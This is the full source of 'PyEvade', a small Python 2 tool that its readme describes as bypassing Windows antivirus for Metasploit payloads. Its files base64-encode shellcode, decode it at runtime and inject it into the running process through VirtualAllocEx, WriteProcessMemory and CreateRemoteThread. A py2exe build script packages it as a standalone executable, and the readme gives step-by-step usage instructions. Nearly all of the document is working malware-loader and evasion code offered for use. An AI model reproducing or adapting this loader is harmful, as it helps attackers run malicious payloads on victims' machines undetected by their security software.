├── PyEvade
    ├── code_injector.py
    ├── encoder.py
    ├── payload.py
    └── setup.py
├── license
└── readme.md


/PyEvade/code_injector.py:
--------------------------------------------------------------------------------
 1 | # code injector module referenced from https://tinyurl.com/y9dgnbpe
 2 | 
 3 | from ctypes import *
 4 | 
 5 | def InjectShellCode(pid, shellcode):
 6 |     page_rwx_value = 0x40
 7 |     process_all = 0x1F0FFF
 8 |     memcommit = 0x00001000
 9 | 
10 |     kernel32_variable = windll.kernel32
11 | 
12 |     shellcode_length = len(shellcode)
13 |     
14 |     process_handle = kernel32_variable.OpenProcess(process_all, False, pid)
15 | 
16 |     memory_allocation_variable = kernel32_variable.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
17 |     kernel32_variable.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
18 |     kernel32_variable.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)
19 | 


--------------------------------------------------------------------------------
/PyEvade/encoder.py:
--------------------------------------------------------------------------------
 1 | import base64, os
 2 | 
 3 | # shellcode (eg. xr8\x02... or shellcode = buf)
 4 | shellcode = ""
 5 | 
 6 | encodedshellcode = base64.b64encode(shellcode)
 7 | 
 8 | os.system("echo " + encodedshellcode + "|clip")
 9 | 
10 | print "encoded shellcode copied to clipboard"
11 | 


--------------------------------------------------------------------------------
/PyEvade/payload.py:
--------------------------------------------------------------------------------
 1 | import os, base64, sys, time, code_injector, win32api, win32event, winerror
 2 | 
 3 | encodedShellcode = ""
 4 | 
 5 | # prevent multiple instances
 6 | mutex = win32event.CreateMutex(None, 1, "PKNBW_MUTEX_GJSU21")
 7 | if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
 8 |     mutex = None
 9 |     sys.exit(0)
10 | 
11 | shellcode = base64.b64decode(encodedShellcode)
12 | 
13 | pid = os.getpid()  # get current pid
14 | 
15 | code_injector.InjectShellCode(pid, shellcode)
16 | 
17 | while True:  # run forever
18 |     time.sleep(99999)
19 | 


--------------------------------------------------------------------------------
/PyEvade/setup.py:
--------------------------------------------------------------------------------
 1 | from distutils.core import setup
 2 | import py2exe
 3 | 
 4 | setup(script_args = ['py2exe'],
 5 |       windows=[{'script':'payload.py'}],
 6 |       options = {'py2exe': {'excludes': ['Tkconstants', 'Tkinter'],
 7 | 							'bundle_files':1
 8 |                             },
 9 |                  },
10 | 		zipfile = None,
11 | 		)
12 | 


--------------------------------------------------------------------------------
/license:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 xp4xbox
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | # PyEvade
 2 | PyEvade is a simple tool to bypass many antivirus solutions on windows for metasploit payloads.
 3 | 
 4 | ## Installation
 5 | PyEvade requires:
 6 | 
 7 | * [Python 2.7](https://www.python.org/downloads)
 8 | * [Pywin32](https://sourceforge.net/projects/pywin32/files/pywin32/)
 9 | * [Py2Exe](https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
10 | 
11 | ## Usage
12 | 
13 | 1. Generate raw shellcode using metasploit using `-f python` to get the correct output. eg. (eg. xr8\x02...)
14 | 2. Generate encoded shellcode using the [encoder](https://github.com/xp4xbox/PyEvade/blob/master/PyEvade/encoder.py). Setting `shellcode` to be to be your raw shellcode (eg. shellcode = buf).
15 | 3. Set `encodedShellcode` to be your encoded shellcode in [payload.py](https://github.com/xp4xbox/PyEvade/blob/master/PyEvade/payload.py).
16 | 4. Run `python setup.py` to build your program to standalone .exe.
17 | 
18 | ### How It Works
19 | 
20 | This tool works by encoding the raw metasploit payload to base64. Then decoding it and injecting the raw shellcode into the file itself on execution.
21 | 


--------------------------------------------------------------------------------